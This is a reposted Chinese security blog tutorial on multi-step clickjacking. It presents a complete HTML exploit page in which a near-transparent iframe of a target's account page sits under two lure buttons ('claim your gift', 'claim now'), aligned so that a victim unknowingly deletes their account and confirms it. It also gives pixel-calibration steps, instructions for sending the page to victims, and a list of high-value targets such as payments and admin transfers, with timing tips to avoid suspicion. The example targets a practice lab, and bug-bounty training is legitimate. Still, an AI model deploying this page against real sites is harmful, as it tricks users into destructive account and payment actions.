文章总结: 本文详细解析二次点击劫持攻击技术,重点介绍利用三层叠加(目标页面、透明iframe、诱饵按钮)实现多步操作的原理。通过精细调参脚本实现像素级对齐,使受害者在不知情下完成删除账户等敏感操作。文章包含完整攻击代码、五阶段实战操作指南及黄金应用场景分析,强调该技术在账户管理、支付流程等场景的有效性。 综合评分: 85 文章分类: WEB安全,渗透测试,红队,安全工具,实战经验
赏金猎人进阶必修课:二次点击劫持从原理到调参,附精细脚本
原创
升斗安全XiuXiu 升斗安全XiuXiu
升斗安全
2026年6月18日 08:18 广东
在小说阅读器读本章
去阅读
【文章说明】
- 目的:本文内容仅为网络安全技术研究与教育目的而创作。
- 红线:严禁将本文知识用于任何未授权的非法活动。使用者必须遵守《网络安全法》等相关法律。
- 责任:任何对本文技术的滥用所引发的后果自负,与本公众号及作者无关。
- 免责:内容仅供参考,作者不对其准确性、完整性作任何担保。
阅读即代表您同意以上条款。
兄弟们,今天聊个前端攻击里的”脏套路”【多步点击劫持】。这玩意儿牛逼在哪?它不靠0day,不搞注入,就凭几个div叠在一起,能让目标用户在毫不知情的情况下,一步一步完成你预设的操作,比如删掉自己的账号、下单买货、改密码……你说邪门不邪门?
我在实战里见过太多人把点击劫持想简单了,以为就是盖个透明iframe等人来点。但真正的精髓在于多步【两步操作】,中间还带确认弹窗的,照样给你安排得明明白白。今天我就用最接地气的方式,把这套组合拳从头拆到尾,顺便附上我调参的祖传脚本,拿走即用。
核心逻辑:三层叠加大法
说白了就三样东西叠在一起:
- 最底层:目标网站的真实页面(比如用户中心)
- 中间层:一个几乎完全透明的iframe,盖住目标页面的关键按钮
- 最上层:两个诱饵按钮,一个写着”点我领券”,一个写着”确认领取”
用户以为自己在薅羊毛,实际上第一点击中了”删除账户”,第二点击中了弹窗里的”确认删除”。整个过程行云流水,用户连反应的时间都没有。
这个手法最狠的地方在于利用了用户的惯性思维:第一次点击后弹出确认框,用户会觉得”哦,这是正常流程”,顺手就把第二次也点了。心理学+前端漏洞,双杀。
实战操作手册(附脚本)
下面我把完整步骤拆成五个阶段,跟着走一遍,你也能在靶场里复刻出来。
第一阶段:准备工作
- 登录目标网站的测试账户,进入用户中心页面(/my-account)
- 打开攻击服务器(Burp Collaborator或你自己搭的exploit server)
- 准备一杯咖啡,因为接下来的调参可能需要点耐心
第二阶段:搭建攻击载体
把下面这套完整脚本粘贴到攻击服务器的”Body”区域。这是经过实战打磨的最终版,注释都给你写好了:
<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>多步点击劫持 - 渗透老炮专用</title> <style> /* ========== 透明iframe:盖住目标页面 ========== */ iframe { position: relative; /* 相对定位,方便叠层 */ width: 500px; /* 宽度根据目标页面调整,建议从500px起步 */ height: 700px; /* 高度同理,700px是通用参考值 */ opacity: 0.0001; /* 几乎完全透明,肉眼看不见,但点击穿透有效 */ z-index: 1; /* 放在最底层 */ border: none; /* 去掉边框,更隐蔽 */ } /* ========== 诱饵按钮:让用户心甘情愿点下去 ========== */ .firstClick, .secondClick { position: absolute; /* 绝对定位,精确控制位置 */ z-index: 2; /* 浮在iframe上层,确保用户点的是诱饵 */ cursor: pointer; /* 鼠标变手型,增加真实感 */ padding: 12px 28px; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: #fff; font-size: 18px; font-weight: 700; border: none; border-radius: 30px; box-shadow: 0 4px 15px rgba(0,0,0,0.2); text-align: center; letter-spacing: 1px; transition: transform 0.2s; } /* 鼠标悬停时的微动效,更逼真 */ .firstClick:hover, .secondClick:hover { transform: scale(1.05); } /* ========== 诱饵1:对齐第一个关键按钮(比如"删除账户") ========== */ .firstClick { top: 330px; /* 垂直位置,典型参考值 */ left: 50px; /* 水平位置,需反复调试 */ } /* ========== 诱饵2:对齐第二个关键按钮(比如确认框里的"是") ========== */ .secondClick { top: 285px; /* 垂直位置,典型参考值 */ left: 225px; /* 水平位置,需反复调试 */ } </style></head><body> <!-- 诱饵1:吸引用户第一次点击 --> <div class="firstClick">🎁 点我领专属福利</div> <!-- 诱饵2:吸引用户第二次点击(确认) --> <div class="secondClick">✅ 立即领取</div> <!-- 目标网站:被攻击的页面 --> <iframe src="https://YOUR-LAB-ID.web-security-academy.net/my-account"></iframe></body></html>
第三阶段:调参(灵魂环节)
把脚本粘贴进去后,开始”像素级校准”:
- 替换目标地址:把 YOUR-LAB-ID 换成你的目标地址,这一步忘了的话后面全白干。
- 粗调透明度:先把 opacity 从 0.0001 改成 0.3,让iframe半透明,方便你肉眼看到背后的按钮位置。
校准诱饵1:
在自己的渗透服务器上点击预览,看看脚本实现如何:
- 把鼠标移到”🎁 点我领专属福利”上
- 看光标有没有变成小手 → 变了说明这个诱饵精准盖住了目标按钮
- 如果没变,回到代码里调整 .firstClick 的 top 和 left,每次改5px,直到光标反馈正确为止
校准诱饵2:
-
点击诱饵1(假装完成第一步)
-
再把鼠标移到”✅ 立即领取”上
-
同样检查光标是否变手型
-
没变就调 .secondClick 的 top 和 left
-
精调透明度和文案:
位置对准后,把 opacity 改回 0.0001(极致隐蔽)
-
把诱饵文字改成更有诱惑力的,比如”点击抽iPhone”、”限时领取会员”
老司机私房经验:调参这步最磨人,我见过新手调半小时就放弃了。但你要知道,在真实挖洞场景里,位置偏差5px都可能让整个攻击失效。所以耐心点,把它当成打靶归零,调好了就是降维打击。
第四阶段:发射
- 保存攻击代码
- 点击发送给受害者
- 坐等受害者触发点击
整个过程里,受害者只会看到两个诱人的按钮,点完就发现自己的账户被删了:而他们还以为自己只是领了个优惠券。
实战心得:这招在什么场景最好用?
我拿这招挖过几个SRC的高危漏洞,总结下来有几个黄金场景:
- 账户删除/注销功能:用户最敏感的操作,但一旦被多步劫持,走都走不掉
- 支付确认流程:下单+支付两步,配合得好的话能让用户在购物车里莫名其妙多几件商品
- 权限变更操作:比如转让管理员权限、解绑手机号,两步确认刚好被劫持
关键是两步操作的间隔时间不能太长,最好在3秒内完成,否则用户会起疑心。所以对齐位置的时候,两个诱饵的视觉距离也要近一些,让用户觉得”这是同一个流程的不同步骤”。
兄弟们,该上号了!
这篇文章从写代码到调参心得,全给你了。不是那种网上复制粘贴的垃圾教程,是实打实能拿去打靶场、挖洞用的硬货。
如果你觉得有用,别忘了点个「赞」、点个「推荐」,让更多挖洞兄弟看到这篇干货。
顺手转发到你的技术群,说不定队友下次就靠这招挖到高危了呢?
❤️往期推荐❤️
- 免费打造你的渗透测试 AI助手:Burpsuite+Ollama+本地大模型 → AI辅助分析,赏金猎人高效挖洞(脚本已打包)
- 别只看书了!CTF免费资源+在线靶场福利,这才是赏金猎人的训练营
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:升斗安全 升斗安全XiuXiu 升斗安全XiuXiu《赏金猎人进阶必修课:二次点击劫持从原理到调参,附精细脚本》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论